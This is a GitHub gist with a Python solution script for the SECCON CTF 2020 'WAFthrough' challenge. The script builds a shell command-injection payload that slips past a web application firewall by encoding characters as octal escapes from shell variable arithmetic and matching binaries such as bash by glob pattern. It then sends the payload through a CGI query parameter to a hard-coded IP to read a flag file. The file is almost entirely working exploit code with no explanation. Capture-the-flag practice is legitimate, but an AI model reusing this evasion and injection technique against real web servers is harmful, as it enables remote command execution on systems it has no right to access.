Skip to content

Instantly share code, notes, and snippets.

@icchy
Created Oct 11, 2020
Embed
What would you like to do?
SECCON CTF 2020 - WAFthrough
from urllib.request import urlopen
from urllib import request
import string
def escape(val):
return '''
$'\\\\{}'
'''[1:-1].format(val)
used = []
def gen_lit(c):
if c not in used:
if c not in 'usrbinflagUSRBINFLAG1234567890vwxyz cpth':
if c in string.ascii_letters:
used.append(c)
return c
s = oct(ord(c))[2:]
ret = ""
for n in s:
n = int(n)
if n == 0:
ret += '$?'
continue
if n == 1:
ret += '$((_**_))'
continue
ret += '$((({})/$$))'.format('+'.join(['$$' for i in range(n)]))
return "\\\\{}".format(ret)
def gen_payload(payload):
return '''
/???/[^c-~]?[p-t]h<<<"$'{}'|od"
'''[1:-1].format(''.join([gen_lit(v) for v in payload]))
payload = gen_payload('flag')
print(payload)
print(len(payload))
res = urlopen('http://153.120.168.36/cgi-bin/index.cgi?_=_[$({})]'.format(payload))
print(res.read().decode())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment